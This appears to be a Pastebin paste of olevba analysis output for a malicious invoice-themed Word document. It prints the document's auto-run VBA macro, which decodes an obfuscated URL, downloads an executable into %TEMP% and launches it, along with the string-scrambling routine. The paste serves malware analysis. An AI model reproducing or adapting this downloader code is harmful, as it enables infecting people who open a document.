SHARE
TWEET

Malicious Word macro

dynamoo Feb 27th, 2015 424 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Flags       Filename                                                        
  2. ----------- -----------------------------------------------------------------
  3. OLE:MAS---- inv650988.doc
  4.  
  5. (Flags: OpX=OpenXML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  6.  
  7. ===============================================================================
  8. FILE: inv650988.doc
  9. Type: OLE
  10. -------------------------------------------------------------------------------
  11. VBA MACRO ThisDocument.cls
  12. in file: inv650988.doc - OLE stream: u'Macros/VBA/ThisDocument'
  13. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  14. Sub autoopen()
  15. qK3M8Yvc
  16. End Sub
  17.  
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Class1.cls
  27. in file: inv650988.doc - OLE stream: u'Macros/VBA/Class1'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29. (empty macro)
  30. -------------------------------------------------------------------------------
  31. VBA MACRO fdgfdgfdg.bas
  32. in file: inv650988.doc - OLE stream: u'Macros/VBA/fdgfdgfdg'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34. #If VBA7 Then
  35.     Private Declare PtrSafe Function dfsdfsdffg Lib "urlmon" Alias _
  36.     "URLDownloadToFileA" (ByVal fdgsdfFF As LongPtr, _
  37.     ByVal gfhgfhF As String, _
  38.     ByVal hjkhgFF As String, _
  39.     ByVal gfhfghF As Long, _
  40.     ByVal gfdgdf As LongPtr) As LongPtr
  41. #Else
  42.     Private Declare Function dfsdfsdffg Lib "urlmon" Alias _
  43.     "URLDownloadToFileA" (ByVal fdgsdfFF As Long, _
  44.     ByVal gfhgfhF As String, _
  45.     ByVal hjkhgFF As String, _
  46.     ByVal gfhfghF As Long, _
  47.     ByVal gfdgdf As Long) As Long
  48. #End If
  49.  
  50. Sub qK3M8Yvc()
  51. ZIoX79I wUnMnysKtQAKQMZpELN("hytit5pm:D/@/‚hle/w€.oh%o9m|e|pcacg4eD.\t.-To,nZl}i0n}ex.md,e&/Rj3sG/SbKibn‚.„eIxLe^"), Environ(wUnMnysKtQAKQMZpELN("T^M‚P|")) & wUnMnysKtQAKQMZpELN("\D3$294D2=3S5t2v3;5>.Pe~xYe.")
  52. End Sub
  53. Function ZIoX79I(D8PeV0 As String, j4B1GyX As String) As Boolean
  54. vJHKBJdfkgfg = dfsdfsdffg(0&, D8PeV0, j4B1GyX, 0&, 0&)
  55. uiLb = Shell(j4B1GyX, 1)
  56. End Function
  57.  
  58.  
  59.  
  60.  
  61. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  62. ANALYSIS:
  63. +------------+--------------------+-----------------------------------------+
  64. | Type       | Keyword            | Description                             |
  65. +------------+--------------------+-----------------------------------------+
  66. | Suspicious | Lib                | May run code from a DLL                 |
  67. | Suspicious | Shell              | May run an executable file or a system  |
  68. |            |                    | command                                 |
  69. | Suspicious | Environ            | May read system environment variables   |
  70. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  71. +------------+--------------------+-----------------------------------------+
  72. -------------------------------------------------------------------------------
  73. VBA MACRO Module2.bas
  74. in file: inv650988.doc - OLE stream: u'Macros/VBA/Module2'
  75. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  76.  
  77. Public Function wUnMnysKtQAKQMZpELN(biBIyeZaYdOH As String) As String
  78. GoTo kuddPCezMbIaLPpebUn
  79. kuddPCezMbIaLPpebUn:
  80. For tTFUZcTsUAkgUp = 1 To Len(biBIyeZaYdOH) Step 2
  81. GoTo BHDOSh
  82. BHDOSh:
  83. GoTo NYRvLeyRLBhqqp
  84. NYRvLeyRLBhqqp:
  85. GoTo YfJVVl
  86. YfJVVl:
  87. GoTo kIYQAilFim
  88. kIYQAilFim:
  89. GoTo gtgSuQOrZqcgFgrl
  90. gtgSuQOrZqcgFgrl:
  91. wUnMnysKtQAKQMZpELN = wUnMnysKtQAKQMZpELN & Mid(biBIyeZaYdOH, tTFUZcTsUAkgUp, 1)
  92. GoTo tRJGRjxSGPojLNuOTcRx
  93. tRJGRjxSGPojLNuOTcRx:
  94. GoTo FKhovanmCFIAZoh
  95. FKhovanmCFIAZoh:
  96. GoTo BVyDQNwJjjKS
  97. BVyDQNwJjjKS:
  98. GoTo bGfwQwHBTDaJUbQ
  99. bGfwQwHBTDaJUbQ:
  100. Next
  101. GoTo VQhEzdeKRksiNIJHM
  102. VQhEzdeKRksiNIJHM:
  103. GoTo LcDCSILCcEkhPD
  104. LcDCSILCcEkhPD:
  105. GoTo FTeMMzzbjwYrQvMZN
  106. FTeMMzzbjwYrQvMZN:
  107. GoTo QTqalrnyPQmnxU
  108. QTqalrnyPQmnxU:
  109. End Function
  110.  
  111. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  112. ANALYSIS:
  113. No suspicious keyword or IOC found.
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top